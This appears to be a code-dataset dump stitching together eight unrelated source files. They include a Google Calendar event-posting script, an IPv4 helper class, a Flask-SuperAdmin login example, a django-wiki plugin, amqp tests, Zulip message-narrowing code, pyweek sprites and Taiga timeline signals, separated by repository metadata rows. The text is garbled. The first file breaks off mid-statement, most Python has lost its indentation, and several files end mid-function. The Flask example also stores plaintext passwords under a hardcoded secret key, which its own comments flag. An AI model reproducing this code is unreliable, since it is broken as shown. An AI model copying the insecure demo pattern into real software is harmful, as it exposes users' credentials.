# Google Developers Console:
# project name: tdf-eventos-gcalcli
# activate gcal API
# activate OAuth 2.0 API
# instal: pip3 install --upgrade google-api-python-client
#URL SHORTENER:
# urlshortener.url.list to get a list of shortened links from user
# urlshortener.url.get get info about a shorted url
#GCAL:
# probably we could need it. event['id'] (same as event['iCalUID'], this has @google.com)
# TODO: save processed events to the txt file once the city is done. (avoid possible losts when script breaks)
# FIX: Sometimes it doesn't parse properly (example as of 2017-11-29: Primera Ecomaratón Playas Limpias, Kendo - Seminario Tierra del Fuego)
# TODO: use the metadata in file to check if it's old or not. Reason: events that span multiple days (expositions) and were added later.
# TODO: support to create shorturls
# PRobably we should read config file so we dont hardcode stuff
# TODO: find a way to fix updated events.
# - Search the event in calendar, edit
# - delete the line in processed posts and just add the new one
#
# creating function (https://developers.google.com/google-apps/calendar/v3/reference/events/update)
# []Promps user to enter text to search;
# []searches and gets id;
# prints event info
# asks what to update (start, end, title, location) add more
# creates new title/summary and description
# updates event
# use named tuples
'''>>> from collections import namedtuple
>>> Point = namedtuple('Point', ['x','y'])
>>> p = Point(x=11,y=22)
>>> p = p._replace(x=80)
>>> p
Point(x=80, y=22)
'''
#import sys
import os
import json
import argparse
import random #for the minutes
import datetime
import re
import time
# required Libs (for Google connect)
try:
from apiclient.discovery import build
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
    from oauth2client import client, tools
from apiclient.errors import HttpError
import httplib2
except ImportError as e:
print (" Need Google API libs. Install with: pip3 install --upgrade google-api-python-client")
exit()
#optional libs
try:
import yaml
YAML = True
except ImportError:
#YAML = False
#print (" next time install pyyaml")
print (" Install : pip3 install pyyaml")
exit()
# --------------
# configuration
# --------------
CALENDAR_ID = "primary
|
" #IFTTT uses the primary calendar
POST_FOLDER = '_posts'
# where the posts reside
CITIES = ('rio-grande', 'ushuaia', 'tolhuin')
# we are in a subfolder now, must get the parent folder
ROOT_DIR = os.path.dirname(os.getcwd())
PROCESSED_POSTS_FILE = "processed-posts.txt" #date,city,filename
PROCESSED_POSTS_FILE_LINE = "{ciudad}@{filename}"
# how the places folder is called. rio-grande is called riogrande
PLACES_FOLDER = "_lugares-{ciudad}"
HOUR_SCHEDULE = ('09', '13', '17', '21') #minutes are random
DAYS_BEFORE = 11 #How many days before do we start posting the event?
DAYS_SPANS_MANUAL_UPDATE = 3 # mostly for site update
GOOGLE_AUTH = "client_secrets.json"
USER_CREDENTIALS = 'gcal-tdf-credentials.json'
APPLICATION_NAME = 'tdf-eventos-gcalcli'
# -------------------
# end configuration
# -------------------
FILES_FOR_PROCESSED_LIST = list() #so we write everything once
PROCESSED_POSTS_FILE = os.path.join(os.getcwd(),PROCESSED_POSTS_FILE)
GOOGLE_AUTH = os.path.join(os.getcwd(), GOOGLE_AUTH)
USER_CREDENTIALS = os.path.join(os.getcwd(), USER_CREDENTIALS)
# be nice and allow to include the secret/keys as paramenters
parser = argparse.ArgumentParser()
parser.add_argument("--client", help="path of the client_secret.json")
parser.add_argument("--user", help="path of the user secret_key.json")
parser.add_argument("--clean", help="Cleans the processed file list", action="store_true")
parser.add_argument("--edit", help="Edit an event")
parser.add_argument("--site-update", "-su", help="Add manually, starts from today and spans " + str(DAYS_SPANS_MANUAL_UPDATE) + " days. Mostly for site updates.")
#args = vars(parser.parse_args()) #to dict
args = parser.parse_args()
if args.clean:
clean_processed_file()
exit()
if args.client or args.user:
if args.client:
GOOGLE_AUTH = args.client
if args.user:
USER_CREDENTIALS = args.user
if not os.path.exists(GOOGLE_AUTH):
print (" sorry, I need the app credentials.")
exit()
if args.edit:
#edit_event()
print ("not yet implemented. Sorry")
exit()
# --------------
# functions
# --------------
def get_processed_file():
"""Get the processed file, returning it as a list.
Returns:
list
"""
if os.path.exists(PROCESSED_POSTS_FILE):
with open(PROCESSED_POSTS_FILE,'r',encoding="utf-8") as tmp:
#readlines() includes de new-line char. we want things easy ;)
return tmp.read().splitlines()
return False
def clean_processed_file():
"""Filters processed file, deleting old entries. """
today = datetime.datetime.today()
processed_posts = get_processed_file()
if not processed_posts:
print (" there was an error with the processed file. Does it exist?")
return False
cleaned_posts = list()
for row in processed_posts:
tmp_line = row.split("@")[1]
tmp_line = tmp_line[0:10]
tmp_date = datetime.datetime.strptime(tmp_line, '%Y-%m-%d')
if tmp_date >= today:
cleaned_posts.append(row)
if len(cleaned_posts) > 0:
with open(PROCESSED_POSTS_FILE,'w',encoding="utf-8") as tmp:
tmp.write("\n".join(cleaned_posts))
print(" Processed file cleaned!")
else:
print(" Everything is ok. Processed file not modified. ")
def googleAuth():
"""Authenticate Google API call
Returns:
http object (authorized)
"""
# Storage object holds the credentials (for a single user)
# If the file does not exist, it is created.
storage = Storage(USER_CREDENTIALS)
# Get the credentials
credentials = storage.get()
if not credentials or credentials.invalid:
'''
flow = OAuth2WebServerFlow(client_id=API_CLIENT_ID,
client_secret=API_CLIENT_SECRET,
scope=['https://www.googleapis.com/auth/calendar',
'https://www.googleapis.com/auth/urlshortener']
)
'''
flow = client.flow_from_clientsecrets(
GOOGLE_AUTH,
scope=['https://www.googleapis.com/auth/calendar',
'https://www.googleapis.com/auth/urlshortener'],
)
flow.user_agent = APPLICATION_NAME
# new credentials need to be obtained.
# oauth2client.tools.run() opens an authorization server page
# in default web browser.
# The new credentials are also stored in the Storage object,
# which updates the credentials file.
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
if flags:
credentials = tools.run_flow(flow, storage, flags)
print (" storing credentials to " + USER_CREDENTIALS)
# authorize credentials
http = credentials.authorize(httplib2.Http())
return http
def useService(service_type):
""" "Shortcut" to the service/API call
Args:
service_type (str): which service? calendar or url (urlshortener)
Returns:
build object kind of thing (google)
"""
service = ("", "")
if service_type == "calendar":
service = ("calendar", "v3")
elif service_type == "url":
service = ("urlshortener", "v1")
else:
print (" wrong key for Google Service")
exit()
return build(serviceName=service[0], version=service[1], http=googleAuth())
def listEvents():
# The Calendar API's events().list method returns paginated results, so we
# have to execute the request in a paging loop. First, build the
# request object. The arguments provided are:
# primary calendar for user
service = useService('calendar')
request = service.events().list(calendarId=CALENDAR_ID)
# Loop until all pages have been processed.
while request != None
|
srguiwiz/nrvr-commander
|
src/nrvr/util/ipaddress.py
|
Python
|
bsd-2-clause
| 7,449
| 0.003088
|
#!/usr/bin/python
"""nrvr.util.ipaddress - Utilities regarding IP addresses
Class provided by this module is IPAddress.
Works in Linux and Windows.
Idea and first implementation - Leo Baschy <srguiwiz12 AT nrvr DOT com>
Contributor - Nora Baschy
Public repository - https://github.com/srguiwiz/nrvr-commander
Copyright (c) Nirvana Research 2006-2015.
Simplified BSD License"""
import re
class IPAddress(object):
"""Methods for multiple machines on one subnet.
As implemented only supports IPv4."""
octetsRegex = re.compile(r"^\s*([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\s*$")
@classmethod
def asList(cls, ipaddress, rangeCheck=False):
"""For ipaddress="10.123.45.67" return mutable [10, 123, 45, 67].
If already a list, a copy is made and returned."""
if isinstance(ipaddress, basestring):
octetsMatch = IPAddress.octetsRegex.search(ipaddress)
if not octetsMatch:
raise Exception("won't recognize as IP address: {0}".format(ipaddress))
octets = [octetsMatch.group(1),
octetsMatch.group(2),
octetsMatch.group(3),
octetsMatch.group(4)]
for index, octet in enumerate(octets):
octet = int(octet)
if rangeCheck and octet > 255:
raise Exception("won't recognize as IP address because > 255: {0}".format(ipaddress))
octets[index] = octet
return octets
elif isinstance(ipaddress, (int, long)):
octets = []
while ipaddress:
octets.append(ipaddress % 256)
ipaddress /= 256
octets += [0 for i in range(max(4 - len(octets), 0))]
octets.reverse()
return octets
else:
# force making a copy
return list(ipaddress)
    @classmethod
def asTuple(cls, ipaddress):
"""For ipaddress="10.123.45.67" return immutable (10, 123, 45, 67)."""
if isinstance(ipaddress, tuple):
return ipaddress
elif isinstance(ipaddress, list):
return tuple(ipaddress)
else:
return tuple(cls.asList(ipaddress))
@classmethod
def asString(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return "10.123.45.67"."""
if isinstance(ipaddress, basestring):
return ipaddress
if isinstance(ipaddress, (int, long)):
ipaddress = cls.asList(ipaddress)
return ".".join(map(str, ipaddress))
@classmethod
def asInteger(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return 175844675.
At the time of this writing, such an integer however is
not accepted as input by other methods of this class."""
octets = cls.asList(ipaddress) # must make a copy
integer = 0
while octets:
integer = 256 * integer + octets.pop(0)
return integer
@classmethod
def bitAnd(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet & otherOctet)
return octets
@classmethod
def bitOr(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet | otherOctet)
return octets
@classmethod
def bitNot(cls, one):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
octets = []
for oneOctet in one:
octets.append(~oneOctet & 255)
return octets
@classmethod
def nameWithNumber(cls, stem, ipaddress, octets=1, separator="-"):
"""For stem="example" and ipaddress="10.123.45.67" return "example-067".
If octets=2 return "example-045-067"."""
name = stem
ipaddress = IPAddress.asTuple(ipaddress)
if not separator:
# empty string instead of e.g. None
separator = ""
for index in range(-octets, 0):
# create leading zeros, e.g. from "19" to "019"
name += separator + "%03d" % ipaddress[index]
return name
@classmethod
def numberWithinSubnet(cls, oneInSubnet, otherNumber, netmask="255.255.255.0"):
"""For oneInSubnet="10.123.45.67" and otherNumber="89" return [10, 123, 45, 89].
For oneInSubnet="10.123.45.67" and otherNumber="89.34" and netmask="255.255.0.0" return [10, 123, 89, 34]."""
if not isinstance(oneInSubnet, (list, tuple)):
oneInSubnet = cls.asList(oneInSubnet)
# less than stellar decoding of otherNumber, but it works in actual use cases
if isinstance(otherNumber, int):
# in theory handling more than 16 bits' 65536 would be desirable,
# practically handling up to 16 bits' 65535 is enough
if otherNumber <= 255:
otherNumber = [otherNumber]
else:
otherNumber = [otherNumber >> 8, otherNumber & 255]
if not isinstance(otherNumber, (list, tuple)):
otherNumber = otherNumber.split(".")
otherNumber = map(int, otherNumber)
if not isinstance(netmask, (list, tuple)):
netmask = cls.asList(netmask)
complementOfNetmask = cls.bitNot(netmask)
contributedBySubnet = cls.bitAnd(oneInSubnet, netmask)
otherNumber = [0] * (len(contributedBySubnet) - len(otherNumber)) + otherNumber
contributedByNumber = cls.bitAnd(otherNumber, complementOfNetmask)
result = cls.bitOr(contributedBySubnet, contributedByNumber)
return result
if __name__ == "__main__":
print IPAddress.asList("10.123.45.67")
print IPAddress.asList((192, 168, 95, 17))
print IPAddress.asList([192, 168, 95, 17])
print IPAddress.asList(175844675)
print IPAddress.asTuple("10.123.45.67")
print IPAddress.asTuple([192, 168, 95, 17])
print IPAddress.asTuple((192, 168, 95, 17))
print IPAddress.asTuple(175844675)
print IPAddress.asString([192, 168, 95, 17])
print IPAddress.asString((192, 168, 95, 17))
print IPAddress.asString("10.123.45.67")
print IPAddress.asString(175844675)
print IPAddress.asInteger("10.123.45.67")
print IPAddress.asInteger([10,123,45,67])
print IPAddress.bitAnd("10.123.45.67", "255.255.255.0")
print IPAddress.bitOr(IPAddress.bitAnd("10.123.45.67", "255.255.255.0"), "0.0.0.1")
print IPAddress.bitNot("1.2.3.4")
print IPAddress.nameWithNumber("example", "10.123.45.67")
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=2)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=3)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=4)
print IPAddress.numberWithinSubnet("10.123.45.67", "89")
print IPAddress.numberWithinSubnet("10.123.45.67", 89)
print IPAddress.numberWithinSubnet("10.123.45.67", "89.34", netmask="255.255.0.0")
print IPAddress.numberWithinSubnet("10.123.45.67", 22818, netmask="255.255.0.0")
|
syrusakbary/Flask-SuperAdmin
|
examples/auth/auth.py
|
Python
|
bsd-3-clause
| 3,960
| 0.000253
|
from flask import Flask, url_for, redirect, render_template, request
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import superadmin, login, wtf
from flask.ext.superadmin.contrib import sqlamodel
from wtforms.fields import TextField, PasswordField
from wtforms.validators import Required, ValidationError
# Create application
app = Flask(__name__)
# Create dummy secret key so we can use sessions
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Create user model. For simplicity, it will store passwords in plain text.
# Obviously that's not the right thing to do in a real-world application.
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
login = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120))
password = db.Column(db.String(64))
# Flask-Login integration
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
# Required for administrative interface
def __unicode__(self):
return self.login
# Define login and registration forms (for flask-login)
class LoginForm(wtf.Form):
login = TextField(validators=[Required()])
password = PasswordField(validators=[Required()])
def validate_login(self, field):
user = self.get_user()
if user is None:
raise ValidationError('Invalid user')
if user.password != self.password.data:
raise ValidationError('Invalid password')
def get_user(self):
return db.session.query(User).filter_by(login=self.login.data).first()
class RegistrationForm(wtf.Form):
login = TextField(validators=[Required()])
email = TextField()
password = PasswordField(validators=[Required()])
def validate_login(self, field):
if db.session.query(User).filter_by(login=self.login.data).count() > 0:
raise ValidationError('Duplicate username')
# Initialize flask-login
def init_login():
login_manager = login.LoginManager()
login_manager.setup_app(app)
# Create user loader function
@login_manager.user_loader
def load_user(user_id):
return db.session.query(User).get(user_id)
# Create customized model view class
class MyModelView(sqlamodel.ModelView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Create customized index view class
class MyAdminIndexView(superadmin.AdminIndexView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Flask views
@app.route('/')
def index():
return render_template('index.html', user=login.current_user)
@app.route('/login/', methods=('GET', 'POST'))
def login_view():
form = LoginForm(request.form)
if form.validate_on_submit():
user = form.get_user()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/register/', methods=('GET', 'POST'))
def register_view():
form = RegistrationForm(request.form)
if form.validate_on_submit():
user = User()
form.populate_obj(user)
db.session.add(user)
db.session.commit()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/logout/')
def logout_view():
login.logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
# Initialize flask-login
init_login()
# Create admin
admin = superadmin.Admin(app, 'Auth', index_view=MyAdminIndexView())
# Add view
admin.add_view(MyModelView(User, db.session))
# Create DB
db.create_all()
# Start app
app.debug = True
app.run()
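# Illustrative hardening sketch: the User model above keeps passwords in
# plain text for brevity; the usual fix is hashing with werkzeug (already a
# Flask dependency). Note the password column would need to be wider than
# String(64) to hold a full hash.
from werkzeug.security import check_password_hash, generate_password_hash
stored = generate_password_hash('s3cret')        # store this instead of plain text
assert check_password_hash(stored, 's3cret')     # accepts the right password
assert not check_password_hash(stored, 'wrong')  # rejects anything else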
|
GbalsaC/bitnamiP
|
django-wiki/wiki/plugins/attachments/wiki_plugin.py
|
Python
|
agpl-3.0
| 2,509
| 0.008768
|
# -*- coding: utf-8 -*-
from django.conf.urls.defaults import patterns, url
from django.utils.translation import ugettext_lazy as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from wiki.plugins.attachments import views
from wiki.plugins.attachments import models
from wiki.plugins.attachments import settings
from wiki.plugins.attachments.markdown_extensions import AttachmentExtension
from wiki.plugins.notifications import ARTICLE_EDIT
class AttachmentPlugin(BasePlugin):
#settings_form = 'wiki.plugins.notifications.forms.SubscriptionForm'
slug = settings.SLUG
urlpatterns = patterns('',
url(r'^$', views.AttachmentView.as_view(), name='attachments_index'),
url(r'^search/$', views.AttachmentSearchView.as_view(), name='attachments_search'),
url(r'^add/(?P<attachment_id>\d+)/$', views.AttachmentAddView.as_view(), name='attachments_add'),
url(r'^replace/(?P<attachment_id>\d+)/$', views.AttachmentReplaceView.as_view(), name='attachments_replace'),
        url(r'^history/(?P<attachment_id>\d+)/$', views.AttachmentHistoryView.as_view(), name='attachments_history'),
url(r'^download/(?P<attachment_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^delete/(?P<attachment_id>\d+)/$', views.AttachmentDeleteView.as_view(), name='attachments_delete'),
url(r'^download/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^change/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentChangeRevisionView.as_view(), name='attachments_revision_change'),
)
article_tab = (_(u'Attachments'), "icon-file")
article_view = views.AttachmentView().dispatch
# List of notifications to construct signal handlers for. This
# is handled inside the notifications plugin.
notifications = [{'model': models.AttachmentRevision,
'message': lambda obj: (_(u"A file was changed: %s") if not obj.deleted else _(u"A file was deleted: %s")) % obj.get_filename(),
'key': ARTICLE_EDIT,
'created': True,
'get_article': lambda obj: obj.attachment.article}
]
markdown_extensions = [AttachmentExtension()]
def __init__(self):
#print "I WAS LOADED!"
pass
registry.register(AttachmentPlugin)
|
pexip/os-python-amqp
|
t/unit/test_utils.py
|
Python
|
lgpl-2.1
| 2,126
| 0
|
from __future__ import absolute_import, unicode_literals
from case import Mock, patch
from amqp.five import text_t
from amqp.utils import (NullHandler, bytes_to_str, coro, get_errno, get_logger,
str_to_bytes)
class test_get_errno:
def test_has_attr(self):
exc = KeyError('foo')
exc.errno = 23
assert get_errno(exc) == 23
def test_in_args(self):
exc = KeyError(34, 'foo')
exc.args = (34, 'foo')
assert get_errno(exc) == 34
def test_args_short(self):
        exc = KeyError(34)
assert not get_errno(exc)
def test_no_args(self):
assert not get_errno(object())
class test_coro:
def test_advances(self):
@coro
def x():
yield 1
yield 2
it = x()
assert next(it) == 2
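        # Illustrative note (not part of the original test): amqp.utils.coro is
        # assumed to prime the generator by calling next() once at creation
        # time, which is why the first value observed here is 2 rather than 1.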
class test_str_to_bytes:
def test_from_unicode(self):
assert isinstance(str_to_bytes(u'foo'), bytes)
def test_from_bytes(self):
assert isinstance(str_to_bytes(b'foo'), bytes)
def test_supports_surrogates(self):
bytes_with_surrogates = '\ud83d\ude4f'.encode('utf-8', 'surrogatepass')
assert str_to_bytes(u'\ud83d\ude4f') == bytes_with_surrogates
class test_bytes_to_str:
def test_from_unicode(self):
assert isinstance(bytes_to_str(u'foo'), text_t)
def test_from_bytes(self):
assert bytes_to_str(b'foo')
def test_support_surrogates(self):
assert bytes_to_str(u'\ud83d\ude4f') == u'\ud83d\ude4f'
class test_NullHandler:
def test_emit(self):
NullHandler().emit(Mock(name='record'))
class test_get_logger:
def test_as_str(self):
with patch('logging.getLogger') as getLogger:
x = get_logger('foo.bar')
getLogger.assert_called_with('foo.bar')
assert x is getLogger()
def test_as_logger(self):
with patch('amqp.utils.NullHandler') as _NullHandler:
m = Mock(name='logger')
m.handlers = None
x = get_logger(m)
assert x is m
x.addHandler.assert_called_with(_NullHandler())
|
JanzTam/zulip
|
zerver/views/messages.py
|
Python
|
apache-2.0
| 36,656
| 0.003492
|
from __future__ import absolute_import
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.db import connection
from django.db.models import Q
from zerver.decorator import authenticated_api_view, authenticated_json_post_view, \
has_request_variables, REQ, JsonableError, \
to_non_negative_int, to_non_negative_float
from django.utils.html import escape as escape_html
from django.views.decorators.csrf import csrf_exempt
from zerver.lib import bugdown
from zerver.lib.actions import recipient_for_emails, do_update_message_flags, \
compute_mit_user_fullname, compute_irc_user_fullname, compute_jabber_user_fullname, \
create_mirror_user_if_needed, check_send_message, do_update_message, \
extract_recipients
from zerver.lib.cache import generic_bulk_cached_fetch
from zerver.lib.query import last_n
from zerver.lib.response import json_success, json_error
from zerver.lib.utils import statsd
from zerver.lib.validator import \
check_list, check_int, check_dict, check_string, check_bool
from zerver.models import Message, UserProfile, Stream, Subscription, \
Recipient, UserMessage, bulk_get_recipients, get_recipient, \
get_user_profile_by_email, get_stream, valid_stream_name, \
parse_usermessage_flags, to_dict_cache_key_id, extract_message_dict, \
stringify_message_dict, \
resolve_email_to_domain, get_realm, get_active_streams, \
bulk_get_streams
import sqlalchemy
from sqlalchemy import func
from sqlalchemy.sql import select, join, column, literal_column, literal, and_, \
or_, not_, union_all, alias
import re
import ujson
from zerver.lib.rest import rest_dispatch as _rest_dispatch
rest_dispatch = csrf_exempt((lambda request, *args, **kwargs: _rest_dispatch(request, globals(), *args, **kwargs)))
# This is a Pool that doesn't close connections. Therefore it can be used with
# existing Django database connections.
class NonClosingPool(sqlalchemy.pool.NullPool):
def status(self):
return "NonClosingPool"
def _do_return_conn(self, conn):
pass
def recreate(self):
return self.__class__(creator=self._creator,
recycle=self._recycle,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
echo=self.echo,
logging_name=self._orig_logging_name,
_dispatch=self.dispatch)
sqlalchemy_engine = None
def get_sqlalchemy_connection():
global sqlalchemy_engine
if sqlalchemy_engine is None:
def get_dj_conn():
connection.ensure_connection()
return connection.connection
sqlalchemy_engine = sqlalchemy.create_engine('postgresql://',
creator=get_dj_conn,
poolclass=NonClosingPool,
pool_reset_on_return=False)
sa_connection = sqlalchemy_engine.connect()
sa_connection.execution_options(autocommit=False)
return sa_connection
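# Minimal usage sketch (illustrative assumption, not part of the original file);
# `table` would need to be imported from sqlalchemy.sql alongside the imports above:
#     sa_conn = get_sqlalchemy_connection()
#     query = select([column("id")]).select_from(table("zerver_message")).limit(10)
#     rows = sa_conn.execute(query).fetchall()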
@authenticated_json_post_view
def json_get_old_messages(request, user_profile):
return get_old_messages_backend(request, user_profile)
class BadNarrowOperator(Exception):
def __init__(self, desc):
self.desc = desc
def to_json_error_msg(self):
return 'Invalid narrow operator: ' + self.desc
# When you add a new operator to this, also update zerver/lib/narrow.py
class NarrowBuilder(object):
def __init__(self, user_profile, msg_id_column):
self.user_profile = user_profile
self.msg_id_column = msg_id_column
def add_term(self, query, term):
# We have to be careful here because we're letting users call a method
# by name! The prefix 'by_' prevents it from colliding with builtin
# Python __magic__ stuff.
operator = term['operator']
operand = term['operand']
negated = term.get('negated', False)
method_name = 'by_' + operator.replace('-', '_')
method = getattr(self, method_name, None)
if method is None:
raise BadNarrowOperator('unknown operator ' + operator)
if negated:
maybe_negate = not_
else:
maybe_negate = lambda cond: cond
return method(query, operand, maybe_negate)
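    # Illustrative sketch (not from the original file): a narrow term such as
    # {'operator': 'is', 'operand': 'starred', 'negated': True} resolves to
    # method_name 'by_is', maybe_negate becomes not_, and the emitted SQL
    # condition ends up as NOT (flags & starred_mask != 0).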
def by_has(self, query, operand, maybe_negate):
if operand not in ['attachment', 'image', 'link']:
raise BadNarrowOperator("unknown 'has' operand " + operand)
col_name = 'has_' + operand
cond = column(col_name)
return query.where(maybe_negate(cond))
def by_in(self, query, operand, maybe_negate):
if operand == 'home':
conditions = exclude_muting_conditions(self.user_profile, [])
return query.where(and_(*conditions))
elif operand == 'all':
return query
raise BadNarrowOperator("unknown 'in' operand " + operand)
def by_is(self, query, operand, maybe_negate):
if operand == 'private':
query = query.select_from(join(query.froms[0], "zerver_recipient",
column("recipient_id") ==
literal_column("zerver_recipient.id")))
cond = or_(column("type") == Recipient.PERSONAL,
column("type") == Recipient.HUDDLE)
return query.where(maybe_negate(cond))
elif operand == 'starred':
cond = column("flags").op("&")(UserMessage.flags.starred.mask) != 0
return query.where(maybe_negate(cond))
elif operand == 'mentioned' or operand == 'alerted':
cond = column("flags").op("&")(UserMessage.flags.mentioned.mask) != 0
return query.where(maybe_negate(cond))
raise BadNarrowOperator("unknown 'is' operand " + operand)
_alphanum = frozenset(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
def _pg_re_escape(self, pattern):
"""
Escape user input to place in a regex
Python's re.escape escapes unicode characters in a way which postgres
fails on, u'\u03bb' to u'\\\u03bb'. This function will correctly escape
them for postgres, u'\u03bb' to u'\\u03bb'.
"""
s = list(pattern)
for i, c in enumerate(s):
if c not in self._alphanum:
if c == '\000':
                    s[i] = '\\000'
elif ord(c) >= 128:
# convert the character to hex postgres regex will take
# \uXXXX
s[i] = '\\u{:0>4x}'.format(ord(c))
else:
s[i] = '\\' + c
return ''.join(s)
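    # Illustrative example (assumption, not in the original source): for the
    # pattern u'caf\u00e9.d' this returns u'caf\\u00e9\\.d', i.e. ASCII
    # punctuation gets a single backslash and characters with ord() >= 128 are
    # rewritten as \uXXXX escapes that postgres will accept.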
def by_stream(self, query, operand, maybe_negate):
stream = get_stream(operand, self.user_profile.realm)
if stream is None:
raise BadNarrowOperator('unknown stream ' + operand)
if self.user_profile.realm.domain == "mit.edu":
# MIT users expect narrowing to "social" to also show messages to /^(un)*social(.d)*$/
# (unsocial, ununsocial, social.d, etc)
m = re.search(r'^(?:un)*(.+?)(?:\.d)*$', stream.name, re.IGNORECASE)
if m:
base_stream_name = m.group(1)
else:
base_stream_name = stream.name
matching_streams = get_active_streams(self.user_profile.realm).filter(
name__iregex=r'^(un)*%s(\.d)*$' % (self._pg_re_escape(base_stream_name),))
matching_stream_ids = [matching_stream.id for matching_stream in matching_streams]
recipients = bulk_get_recipients(Recipient.STREAM, matching_stream_ids).values()
cond = column("recipient_id").in_([recipient.id for recipient in recipients])
return query.where(maybe_negate(cond))
recipient = get_recipient(Recipient.STREAM, type_id=stream.id)
cond = column("recipient_id") == recipient.id
        return query.where(maybe_negate(cond))
|
Sveder/pyweek24
|
gamelib/platforms.py
|
Python
|
apache-2.0
| 537
| 0
|
import pygame
from pygame.colordict import THECOLORS
import data
class Platform(pygame.sprite.Sprite):
def __init__(self, width, height):
pygame.sprite.Sprite.__init__(self)
        self.image = pygame.Surface([width, height])
self.image.fill(THECOLORS["green"])
self.rect = self.image.get_rect()
class Trampoline(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = data.load_image("trampoline.png")
        self.rect = self.image.get_rect()
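# Minimal usage sketch (illustrative; the display setup is assumed and not part
# of this file):
#     screen = pygame.display.set_mode((640, 480))
#     sprites = pygame.sprite.Group(Platform(200, 20), Trampoline())
#     sprites.draw(screen)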
|
obimod/taiga-back
|
taiga/timeline/signals.py
|
Python
|
agpl-3.0
| 6,716
| 0.003873
|
# Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from django.utils import timezone
from django.utils.translation import ugettext as _
from taiga.projects.history import services as history_services
from taiga.projects.models import Project
from taiga.users.models import User
from taiga.projects.history.choices import HistoryType
from taiga.timeline.service import (push_to_timeline,
build_user_namespace,
build_project_namespace,
extract_user_info)
# TODO: Add events to followers timeline when followers are implemented.
# TODO: Add events to project watchers timeline when project watchers are implemented.
def _push_to_timeline(*args, **kwargs):
if settings.CELERY_ENABLED:
push_to_timeline.delay(*args, **kwargs)
else:
push_to_timeline(*args, **kwargs)
def _push_to_timelines(project, user, obj, event_type, created_datetime, extra_data={}):
if project is not None:
# Actions related with a project
## Project timeline
_push_to_timeline(project, obj, event_type, created_datetime,
namespace=build_project_namespace(project),
extra_data=extra_data)
## User profile timelines
## - Me
related_people = User.objects.filter(id=user.id)
## - Owner
if hasattr(obj, "owner_id") and obj.owner_id:
related_people |= User.objects.filter(id=obj.owner_id)
## - Assigned to
if hasattr(obj, "assigned_to_id") and obj.assigned_to_id:
related_people |= User.objects.filter(id=obj.assigned_to_id)
## - Watchers
watchers = getattr(obj, "watchers", None)
if watchers:
related_people |= obj.watchers.all()
## - Exclude inactive and system users and remove duplicate
related_people = related_people.exclude(is_active=False)
related_people = related_people.exclude(is_system=True)
related_people = related_people.distinct()
_push_to_timeline(related_people, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
else:
# Actions not related with a project
## - Me
_push_to_timeline(user, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
def _clean_description_fields(values_diff):
    # description_diff and description_html, if included, can be huge; we
    # remove the HTML one and clear the diff.
values_diff.pop("description_html", None)
if "description_diff" in values_diff:
values_diff["description_diff"] = _("Check the history API for the exact diff")
def on_new_history_entry(sender, instance, created, **kwargs):
if instance._importing:
return
if instance.is_hidden:
return None
model = history_services.get_model_from_key(instance.key)
pk = history_services.get_pk_from_key(instance.key)
obj = model.objects.get(pk=pk)
project = obj.project
if instance.type == HistoryType.create:
event_type = "create"
elif instance.type == HistoryType.change:
event_type = "change"
elif instance.type == HistoryType.delete:
event_type = "delete"
user = User.objects.get(id=instance.user["pk"])
values_diff = instance.values_diff
_clean_description_fields(values_diff)
extra_data = {
"values_diff": values_diff,
"user": extract_user_info(user),
"comment": instance.comment,
"comment_html": instance.comment_html,
}
# Detect deleted comment
if instance.delete_comment_date:
extra_data["comment_deleted"] = True
created_datetime = instance.created_at
